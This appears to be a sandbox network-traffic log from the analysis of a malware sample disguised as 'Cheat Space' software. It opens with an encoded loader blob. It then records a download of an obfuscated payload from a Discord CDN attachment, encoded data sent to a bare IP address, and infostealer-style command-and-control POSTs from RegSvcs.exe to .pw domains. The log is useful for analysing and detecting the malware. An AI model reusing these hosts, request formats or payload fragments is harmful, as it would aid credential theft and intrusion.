{"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsN2UsOTQsODEsODUsN2EsYjksYWMsOWEsZTQsYjgsYzIsNTMsODgsOGMsYjIsYjMsZDcsYzcsYmYsZTQsOGUsNTgsNjYsZTgsYmIsY2YsYjcsZGMsYjcsNTYsNmMsNjEsY2MsODUsYzksY2EsZDAsYmEsNWEsNzMsOTAsNjUsOTAsOWYsNmUsZDEsYmUsYzQsZGEsYzYsN2EsZDYsYzUsOWIsYjksZTYsY2MsZDIsYWYsOTksNmYsNTQsNTQsYjQsYzUsYzQsYzksZGEsY2IsNjgsNzIsNTksZDYsYTQsYmIsYTQsYjMsZTksNzgsNzIsOGQsYmMsYzMsY2IsYzcsNWEsN2UsOTQsOGEsOTksNmIsOTksYjMsOTksYTQsYjQsYmEsZDYsYzksY2EsYzYsYTksOWQsNWIsYWEsNjMsODAsYWUs","tasks":"OTMsYjQsOTIsYWMsYjMs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	162.159.130.233	80	8024	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2023 17:22:54.677720070 CET	226	OUT	GET /attachments/1179749162376499230/1179749438646919228/9 HTTP/1.1 Content-Type: application/json User-Agent: Tree Host: cdn.discordapp.com Cache-Control: no-cache
Dec 3, 2023 17:22:54.820837975 CET	1224	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 03 Dec 2023 16:22:54 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Sun, 03 Dec 2023 17:22:54 GMT Location: https://cdn.discordapp.com/attachments/1179749162376499230/1179749438646919228/9 X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=H5V4BmaROe3pfdYLY82TfiD1L50ETnjdEytCTXkusTM-1701620574-0-ASCSLniYwQKwFPBRNPu0k+YvtJNeRyC89AImgI45C/GaNLejxZ26LUu1GIyWcuKrb72UYAVWiHku5jBtFcdc0Bo=; path=/; expires=Sun, 03-Dec-23 16:52:54 GMT; domain=.discordapp.com; HttpOnly; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zo7vCzXIf9mXc3Za9lxEktpctkdDSqfJfstF%2BxudWrAFuzGNfiO9fih50kCO711%2B3g2CFCbjqdBLu2jlIYwFM5OwZhBXr2CYYgBjPQsSWtoLDQ5J%2B19Di3F82ixl6w%2F0TNtjlg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: _cfuvid=LsbyP5n461dKvXB8RQQKi94VdszAbPQe_KfYuUnazwk-1701620574736-0-604800000; path=/; domain=.discordapp.com; HttpOnly Server: cloudflare CF-RAY: 82fd26b00cdc3886-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	80.66.89.151	80	8024	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2023 17:24:05.837959051 CET	327	OUT	PUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1 Content-Type: application/json User-Agent: Tree Host: 80.66.89.151 Content-Length: 95 Cache-Control: no-cache Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 4d 73 4f 57 45 73 5a 54 4d 73 59 57 55 73 4f 54 67 73 4f 54 55 73 4f 47 49 73 59 54 4d 73 4f 44 55 73 4f 44 55 73 4f 54 45 73 59 6a 63 73 59 7a 6b 73 5a 47 4d 73 5a 44 41 73 59 57 4d 73 59 6a 59 73 5a 57 51 73 4f 54 63 73 59 7a 49 73 4f 57 55 3d 22 7d Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODUsODUsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
Dec 3, 2023 17:24:06.303754091 CET	590	IN	HTTP/1.1 204 No Content Server: nginx/1.18.0 (Ubuntu) Date: Sun, 03 Dec 2023 16:24:06 GMT Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7V%2F6tZv%2Bl2aqvVWQ11yMqB%2BRXXvekt3K8K3OkImSeKr3LRIqC8HFYIV30x%2FzReU%2FPYsiJ5dJebYbZ%2FQz3UvC4vP82skBta4zU8YXk9yCY1WpWTT8k%2FSDThUYDK%2Bj4M8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 82fd286dcb66d66a-CDG alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	172.67.136.249	80	2212	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2023 17:24:06.155225992 CET	314	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: pokarisers.pw
Dec 3, 2023 17:24:06.155261040 CET	62	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 3, 2023 17:24:06.677180052 CET	1340	IN	HTTP/1.1 200 OK Date: Sun, 03 Dec 2023 16:24:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=i038l5glc55hdfkfj2osnd1eqd; expires=Thu, 28 Mar 2024 10:10:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Thu, 01 Feb 2024 16:24:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Thu, 01 Feb 2024 16:24:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Thu, 01 Feb 2024 16:24:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FFArwX3suCsv%2FG10AWsctB6Eq85Xu3Jje5YON8wz7b2HdnmTOSsVaHf37QFOfml0Xtczqv%2Fs5jpjYLe5c0Gs0JV45ccFVYcd2PvDfIiqFFlVLesij2h%2Fc9ETAjcarH83"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF Data Raw: Data Ascii:
Dec 3, 2023 17:24:06.677216053 CET	98	IN	Data Raw: 52 41 59 3a 20 38 32 66 64 32 38 36 65 62 65 32 66 30 61 30 37 2d 49 41 44 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: RAY: 82fd286ebe2f0a07-IADaerror #D12
Dec 3, 2023 17:24:06.677227974 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	172.67.154.200	80	2212	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2023 17:24:06.953691006 CET	320	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tirechinecarpett.pw
Dec 3, 2023 17:24:06.953735113 CET	62	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 3, 2023 17:24:07.096159935 CET	1340	IN	HTTP/1.1 200 OK Date: Sun, 03 Dec 2023 16:24:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UWh7jRJMzCcFynTmG07h8wOtajk2msVKVR5Za2YkWydVV%2FYm%2FlHDeTDzFy0IRcUbSM81hyfgogp5IGN%2BEarbL7pktG%2B7%2BF0Qz%2FUiUHxutC3WIEOnpoLItRlQQNAaCbPMNg4kRO4e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82fd2873b85b207e-IAD Data Raw: 31 32 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e Data Ascii: 1277<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.
Dec 3, 2023 17:24:07.096174955 CET	1340	IN	Data Raw: 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 Data Ascii: css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { wind
Dec 3, 2023 17:24:07.096185923 CET	1340	IN	Data Raw: 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 Data Ascii: information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="4HOol
Dec 3, 2023 17:24:07.096225977 CET	1340	IN	Data Raw: 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a Data Ascii: :text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">82fd2873b85b207e</strong></span> <span class="cf-footer-se
Dec 3, 2023 17:24:07.096239090 CET	205	IN	Data Raw: 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 Data Ascii: -> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 3, 2023 17:24:07.096250057 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 3, 2023 17:24:07.126616001 CET	404	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=4HOolOafwCkK5gPKklWV6S.m_Bnjip9GaV4x1Mq2EKQ-1701620647-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: tirechinecarpett.pw
Dec 3, 2023 17:24:07.126652956 CET	108	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 52 43 68 75 77 6e 2d 2d 4c 6f 64 6b 61 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=RChuwn--Lodka&j=default&ver=4.0
Dec 3, 2023 17:24:07.586757898 CET	1340	IN	HTTP/1.1 200 OK Date: Sun, 03 Dec 2023 16:24:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=2lbqdulkvb7mbg808km05kf2to; expires=Thu, 28 Mar 2024 10:10:46 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Thu, 01 Feb 2024 16:24:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Thu, 01 Feb 2024 16:24:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Thu, 01 Feb 2024 16:24:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FDMFC1Om5yDf7VtIZVKs%2FMndsze%2FWFo3rn%2BdoRpqB%2Fer2%2BRBXxraucATObxm9IPV1%2BURk5AD3gmhcYmupYiEwThFchLKx232f6F2UZz6Rih%2BtUY5ujnFoANDKd1oBVeRYX1%2BTgjW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server Data Raw: Data Ascii:
Dec 3, 2023 17:24:07.586781025 CET	114	IN	Data Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 66 64 32 38 37 34 64 39 62 32 32 30 37 65 2d 49 41 44 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: cloudflareCF-RAY: 82fd2874d9b2207e-IADaerror #D12
Dec 3, 2023 17:24:07.586795092 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	162.159.130.233	443	8024	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-03 16:22:55 UTC	406	OUT	GET /attachments/1179749162376499230/1179749438646919228/9 HTTP/1.1 User-Agent: Tree Cache-Control: no-cache Host: cdn.discordapp.com Connection: Keep-Alive Cookie: __cf_bm=H5V4BmaROe3pfdYLY82TfiD1L50ETnjdEytCTXkusTM-1701620574-0-ASCSLniYwQKwFPBRNPu0k+YvtJNeRyC89AImgI45C/GaNLejxZ26LUu1GIyWcuKrb72UYAVWiHku5jBtFcdc0Bo=; _cfuvid=LsbyP5n461dKvXB8RQQKi94VdszAbPQe_KfYuUnazwk-1701620574736-0-604800000
2023-12-03 16:22:55 UTC	1278	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 30 33 20 44 65 63 20 32 30 32 33 20 31 36 3a 32 32 3a 35 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 37 33 39 35 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 32 66 64 32 36 62 33 63 63 39 38 31 37 36 65 2d 49 41 44 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 2c 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 37 37 32 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d Data Ascii: HTTP/1.1 200 OKDate: Sun, 03 Dec 2023 16:22:55 GMTContent-Type: application/octet-streamContent-Length: 15739597Connection: closeCF-Ray: 82fd26b3cc98176e-IADCF-Cache-Status: HITAccept-Ranges: bytes, bytesAge: 7722Cache-Control: public, m
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 38 35 2c 39 33 2c 31 30 30 2c 34 33 2c 35 32 2c 33 31 2c 34 65 2c 36 63 2c 35 30 2c 35 32 2c 36 62 2c 35 34 2c 31 35 39 2c 31 36 36 2c 36 32 2c 33 38 2c 66 63 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 37 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 64 35 2c 36 35 2c 35 38 2c 34 36 2c 34 36 2c 35 38 2c 31 32 61 2c 35 31 2c 34 66 2c 65 35 2c 35 37 2c 31 33 39 2c 36 64 2c 31 30 61 2c 36 63 2c 61 30 2c 31 32 37 2c 38 38 2c 62 36 2c 61 30 2c 61 64 2c 65 37 2c 37 61 Data Ascii: 85,93,100,43,52,31,4e,6c,50,52,6b,54,159,166,62,38,fc,74,5a,6d,4b,77,43,34,72,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,d5,65,58,46,46,58,12a,51,4f,e5,57,139,6d,10a,6c,a0,127,88,b6,a0,ad,e7,7a
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 33 2c 38 66 2c 33 31 2c 34 65 2c 31 32 63 2c 37 61 2c 63 34 2c 64 65 2c 63 36 2c 62 64 2c 36 37 2c 36 32 2c 33 38 2c 63 63 2c 65 34 2c 35 62 2c 36 64 2c 34 62 2c 31 35 37 2c 38 62 2c 33 34 2c 33 32 2c 62 33 2c 35 32 2c 36 33 2c 35 35 2c 66 64 2c 61 30 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 39 61 2c 36 37 2c 36 32 2c 37 38 2c 37 32 2c 65 36 2c 62 66 2c 64 39 2c 62 61 2c 64 61 2c 34 33 2c 33 34 2c 33 65 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 63 35 2c 61 32 2c 34 36 2c 33 38 2c 33 62 2c 37 30 2c 34 33 2c 34 66 2c 33 62 2c 39 38 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 38 62 2c 37 37 2c 34 33 2c 37 36 Data Ascii: 3,8f,31,4e,12c,7a,c4,de,c6,bd,67,62,38,cc,e4,5b,6d,4b,157,8b,34,32,b3,52,63,55,fd,a0,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,9a,67,62,78,72,e6,bf,d9,ba,da,43,34,3e,41,51,63,55,c5,a2,46,38,3b,70,43,4f,3b,98,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,8b,77,43,76
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c Data Ascii: 54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 2c 36 62 2c 35 34 2c 35 62 2c 36 37 2c 36 32 2c 34 39 2c 36 66 2c 37 64 2c 38 32 2c 63 65 2c 61 32 2c 66 30 2c 61 31 2c 34 38 2c 34 38 2c 64 62 2c 37 37 2c 37 39 2c 38 32 2c 31 35 65 2c 37 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 37 62 2c 62 38 2c 33 31 2c 34 65 2c 36 63 2c 62 66 2c 36 61 2c 36 62 2c 35 34 2c 36 34 2c 65 37 2c 36 34 2c 33 38 2c 34 34 2c 37 38 2c 39 32 2c 61 62 2c 34 62 2c 37 37 2c 34 33 2c 35 61 2c 35 32 2c 34 35 2c 35 31 2c 36 33 2c 35 35 2c 39 64 2c 61 37 2c 34 36 2c 33 38 2c 33 39 2c 65 33 2c 35 63 2c 34 66 2c 33 31 2c 35 38 2c 65 63 2c 34 64 2c 35 32 2c 36 62 2c 35 38 2c 38 32 2c 37 61 2c 36 32 2c 33 38 2c 34 61 2c 39 63 2c 36 63 2c 36 64 2c 34 62 2c 37 64 2c 37 63 2c 31 31 30 2c 31 33 31 2c 31 34 30 2c 31 35 30 2c 38 39 2c 37 35 2c Data Ascii: ,6b,54,5b,67,62,49,6f,7d,82,ce,a2,f0,a1,48,48,db,77,79,82,15e,78,46,38,39,70,7b,b8,31,4e,6c,bf,6a,6b,54,64,e7,64,38,44,78,92,ab,4b,77,43,5a,52,45,51,63,55,9d,a7,46,38,39,e3,5c,4f,31,58,ec,4d,52,6b,58,82,7a,62,38,4a,9c,6c,6d,4b,7d,7c,110,131,140,150,89,75,
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 2c 35 37 2c 36 35 2c 63 62 2c 37 34 2c 38 32 2c 37 39 2c 31 34 62 2c 36 62 2c 64 32 2c 35 66 2c 36 37 2c 36 32 2c 33 63 2c 62 33 2c 39 35 2c 35 61 2c 36 64 2c 35 35 2c 38 31 2c 37 62 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 39 2c 37 66 2c 36 35 2c 35 38 2c 34 36 2c 38 65 2c 36 34 2c 37 39 2c 36 62 2c 38 64 2c 39 38 2c 36 65 2c 61 38 2c 36 30 2c 36 38 2c 31 30 35 2c 37 61 2c 37 30 2c 39 34 2c 31 35 62 2c 33 38 2c 36 63 2c 31 35 62 2c 39 61 2c 36 64 2c 35 31 2c 61 31 2c 34 33 2c 33 34 2c 37 34 2c 36 63 2c 35 61 2c 38 62 2c 61 64 2c 31 31 37 2c 38 63 2c 39 65 2c 34 63 2c 34 66 2c 31 30 61 2c 36 39 2c 36 35 2c 35 65 2c 31 34 37 2c 38 33 2c 37 36 2c 35 32 2c 36 62 2c 35 34 2c 39 63 2c 39 32 2c 36 62 2c 36 30 2c 35 33 2c 39 61 2c 36 39 2c 61 36 2c 35 66 2c 38 Data Ascii: 